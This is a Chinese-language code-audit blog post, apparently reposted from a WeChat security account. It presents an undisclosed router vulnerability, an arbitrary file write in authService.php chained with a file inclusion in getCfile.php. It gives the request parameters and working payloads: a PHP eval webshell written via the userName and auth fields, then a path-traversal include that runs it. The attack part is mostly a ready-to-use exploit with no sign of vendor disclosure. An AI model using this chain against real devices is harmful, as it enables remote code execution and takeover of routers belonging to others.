某路由审计0day之文件包含-2

  • A+
所属分类:代码审计


01

审计步骤


(一)查找写入文件函数:


自动化审计,在这个/auth_pi/authService.php文件下发现file_put_contents函数可控,跟进该文件。


某路由审计0day之文件包含-2


/auth_pi/authService.php文件的set_authAction方法。在76行的提醒语句也说明了该info文件在user_auth目录下,而且也未对userName进行安全过滤,这里可以任意路径创建文件。


某路由审计0day之文件包含-2


而P方法存在于/mvc/lib/core.function.php的类里面,是用来接收POST传参。


某路由审计0day之文件包含-2


这里注意:包含路径是data下的


某路由审计0day之文件包含-2


利用方式:


1:post请求2:请求参数a=set_auth3:参数为userName、auth


payload:


userName=tr1&auth=<?php%20@eval($_POST['w']);?>


某路由审计0day之文件包含-2


(二)查找文件包含函数:


自动化审计,在这个/local/auth/php/getCfile.php文件下发现include 函数可控,跟进该文件。


某路由审计0day之文件包含-2


这个文件通过post方式传参但是并没有对cf参数进行安全过滤


某路由审计0day之文件包含-2


利用方式:


1:post请求2:必须存在tmp/app_auth/cfile目录或者自己创建3:参数为cf、&field=1


payload:


cf=../../../data/tr.info&field=1&w=phpinfo();


说明:这里的文件需要刚刚写文件的文件名


某路由审计0day之文件包含-2


某路由审计0day之文件包含-2

【火线短视频精选】



【周度激励】2021.8.16 ~ 2021.8.22


某路由审计0day之文件包含-2


【相关精选文章】


这是一个SQL注入利用 in 进行waf绕过的图文实例


洞态IAST Python探针内测版发布


【招人专区】


某路由审计0day之文件包含-2

某路由审计0day之文件包含-2

本文始发于微信公众号(火线Zone):某路由审计0day之文件包含-2

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: